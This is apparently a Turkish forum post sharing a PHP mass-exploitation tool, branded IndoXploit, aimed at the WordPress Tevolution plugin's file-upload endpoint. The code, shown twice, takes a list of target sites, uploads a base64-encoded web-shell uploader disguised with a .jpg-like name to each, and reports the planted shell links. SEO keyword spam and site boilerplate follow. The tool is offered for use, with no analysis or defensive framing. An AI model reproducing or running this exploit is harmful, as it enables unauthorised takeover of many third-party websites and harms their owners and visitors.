Konuyu Oyla:
  • Toplam: 0 Oy - Ortalama: 0
  • 1
  • 2
  • 3
  • 4
  • 5
WordPress Plugins Tevolution Mass Xploiter
#1
WordPress Plugins Tevolution Mass Xploiter


Code:
<html>
<
center>
<
form method="post" enctype="multipart/form-data">
Shellname: <br><input type="text" name='filename' style='width: 500px;' height="10" value='indoxploit.php.xxxjpg' required><br>
Target: <br><textarea name="url" style="width: 500px; height: 200px;" placeholder="http://www.target.com/"></textarea><br>
<
input type='submit' name='exp' value='Hajar!' style='width: 500px;'>
</
form>
<?
php
// IndoXploit
set_time_limit(0);
error_reporting(0);
 
function 
buffer() {
    
ob_flush();
    
flush();
}
function 
curl($url$payload) {
    
$ch curl_init();
          
curl_setopt($chCURLOPT_RETURNTRANSFERtrue);
          
curl_setopt($chCURLOPT_URL$url);
          
curl_setopt($chCURLOPT_POSTtrue);
          
curl_setopt($chCURLOPT_POSTFIELDS$payload);
          
curl_setopt($chCURLOPT_COOKIEJAR'cookie.txt');
          
curl_setopt($chCURLOPT_COOKIEFILE'cookie.txt');
          
curl_setopt($chCURLOPT_COOKIESESSIONtrue);
          
curl_setopt($chCURLOPT_SSL_VERIFYPEERfalse);
          
curl_setopt($chCURLOPT_SSL_VERIFYHOSTfalse);
          
curl_setopt($chCURLOPT_HEADER0);
          
curl_setopt($chCURLOPT_USERAGENT$_SERVER['HTTP_USER_AGENT']);
          
curl_setopt($chCURLOPT_FOLLOWLOCATIONtrue);
    
$res curl_exec($ch);
          
curl_close($ch);
    return 
$res;
}
$file htmlspecialchars($_POST['filename']);
$site explode("\r\n"$_POST['url']);
$do $_POST['exp'];
$uploader base64_decode("PD9waHANCmVjaG8gIkluZG9YcGxvaXQgLSBBdXRvIFhwbG9pdGVyIjsNCmVjaG8gIjxicj4iLnBocF91bmFtZSgpLiI8YnI+IjsNCmVjaG8gIjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+DQo8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0naWR4Jz48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPg0KPC9mb3JtPiI7DQppZigkX1BPU1RbJ3VwbG9hZCddKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snaWR4J11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2lkeCddWyduYW1lJ10pKSB7DQoJZWNobyAic3Vrc2VzIjsNCgl9IGVsc2Ugew0KCWVjaG8gImdhZ2FsIjsNCgl9DQp9DQo/Pg==");
if(
$do) {
    
$y date("Y");
    
$m date("m");
    
$idx_dir mkdir("indoxploit_tools"0755);
    
$shell "indoxploit_tools/".$file;
    
$fopen fopen($shell"w");
    
fwrite($fopen$uploader);
    
fclose($fopen);
    foreach(
$site as $url) {
        
$target $url.'/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php';
        
$cek_shell "$url/wp-content/uploads/$y/$m/$file";
        
$data = array(
            
"Filedata" => "@$shell"
            
);
        
$curl curl($target$data);
        if(
$curl) {
            
$cek file_get_contents($cek_shell);
            if(
preg_match("/IndoXploit - Auto Xploiter/is"$cek)) {
                echo 
"<a href='$cek_shell' target='_blank'>$cek_shell</a> -> shellmu<br>";
            }
        }
    
buffer();
    }
}
?>
RAW Paste Data


Code:
<html>
<
center>
<
form method="post" enctype="multipart/form-data">
Shellname: <br><input type="text" name='filename' style='width: 500px;' height="10" value='indoxploit.php.xxxjpg' required><br>
Target: <br><textarea name="url" style="width: 500px; height: 200px;" placeholder="http://www.target.com/"></textarea><br>
<
input type='submit' name='exp' value='Hajar!' style='width: 500px;'>
</
form>
<?
php
// IndoXploit
set_time_limit(0);
error_reporting(0);

function 
buffer() {
    
ob_flush();
    
flush();
}
function 
curl($url$payload) {
    
$ch curl_init();
          
curl_setopt($chCURLOPT_RETURNTRANSFERtrue);
          
curl_setopt($chCURLOPT_URL$url);
          
curl_setopt($chCURLOPT_POSTtrue);
          
curl_setopt($chCURLOPT_POSTFIELDS$payload);
          
curl_setopt($chCURLOPT_COOKIEJAR'cookie.txt');
          
curl_setopt($chCURLOPT_COOKIEFILE'cookie.txt');
          
curl_setopt($chCURLOPT_COOKIESESSIONtrue);
          
curl_setopt($chCURLOPT_SSL_VERIFYPEERfalse);
          
curl_setopt($chCURLOPT_SSL_VERIFYHOSTfalse);
          
curl_setopt($chCURLOPT_HEADER0);
          
curl_setopt($chCURLOPT_USERAGENT$_SERVER['HTTP_USER_AGENT']);
          
curl_setopt($chCURLOPT_FOLLOWLOCATIONtrue);
    
$res curl_exec($ch);
          
curl_close($ch);
    return 
$res;
}
$file htmlspecialchars($_POST['filename']);
$site explode("\r\n"$_POST['url']);
$do $_POST['exp'];
$uploader base64_decode("PD9waHANCmVjaG8gIkluZG9YcGxvaXQgLSBBdXRvIFhwbG9pdGVyIjsNCmVjaG8gIjxicj4iLnBocF91bmFtZSgpLiI8YnI+IjsNCmVjaG8gIjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+DQo8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0naWR4Jz48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPg0KPC9mb3JtPiI7DQppZigkX1BPU1RbJ3VwbG9hZCddKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snaWR4J11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2lkeCddWyduYW1lJ10pKSB7DQoJZWNobyAic3Vrc2VzIjsNCgl9IGVsc2Ugew0KCWVjaG8gImdhZ2FsIjsNCgl9DQp9DQo/Pg==");
if(
$do) {
    
$y date("Y");
    
$m date("m");
    
$idx_dir mkdir("indoxploit_tools"0755);
    
$shell "indoxploit_tools/".$file;
    
$fopen fopen($shell"w");
    
fwrite($fopen$uploader);
    
fclose($fopen);
    foreach(
$site as $url) {
        
$target $url.'/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php';
        
$cek_shell "$url/wp-content/uploads/$y/$m/$file";
        
$data = array(
            
"Filedata" => "@$shell"
            
);
        
$curl curl($target$data);
        if(
$curl) {
            
$cek file_get_contents($cek_shell);
            if(
preg_match("/IndoXploit - Auto Xploiter/is"$cek)) {
                echo 
"<a href='$cek_shell' target='_blank'>$cek_shell</a> -> shellmu<br>";
            }
        }
    
buffer();
    }
}
?>
Linkleri görebilmek için Üye Olun veya Giriş Yapın.
Sitemizde Bulunan Türkçe Dublaj Filmler ve Türkçe Programlar Torrentlerinin Hızı Yavaş Olması Nedeniyle Upload Edilmiş Şekilde Sunulmaktadır.


WordPress Plugins Tevolution Mass Xploiter indir, WordPress Plugins Tevolution Mass Xploiter oyunu, WordPress Plugins Tevolution Mass Xploiter download, WordPress Plugins Tevolution Mass Xploiter crack, WordPress Plugins Tevolution Mass Xploiter full indir, WordPress Plugins Tevolution Mass Xploiter torrent, WordPress Plugins Tevolution Mass Xploiter oyunu, WordPress Plugins Tevolution Mass Xploiter oyunu WordPress Plugins Tevolution Mass Xploiter kimdir, WordPress Plugins Tevolution Mass Xploiter izle, WordPress Plugins Tevolution Mass Xploiter Apk indir, WordPress Plugins Tevolution Mass Xploiter resimli anlatım, WordPress Plugins Tevolution Mass Xploiter nasıl kurulur, WordPress Plugins Tevolution Mass Xploiter programı, WordPress Plugins Tevolution Mass Xploiter hatası, WordPress Plugins Tevolution Mass Xploiter ne demek, WordPress Plugins Tevolution Mass Xploiter hilesi, WordPress Plugins Tevolution Mass Xploiter videosu, WordPress Plugins Tevolution Mass Xploiter online izle, WordPress Plugins Tevolution Mass Xploiter Bedava indir, WordPress Plugins Tevolution Mass Xploiter Yükle, WordPress Plugins Tevolution Mass Xploiter hakkında, WordPress Plugins Tevolution Mass Xploiter nedir, WordPress Plugins Tevolution Mass Xploiter Free indir, WordPress Plugins Tevolution Mass Xploiter

Hızlı Menü:


Şu anda bu konuyu okuyanlar: 1 Ziyaretçi

Online Shopping App
Online Shopping - E-Commerce Platform
Online Shopping - E-Commerce Platform
Feinunze Schmuck Jewelery Online Shopping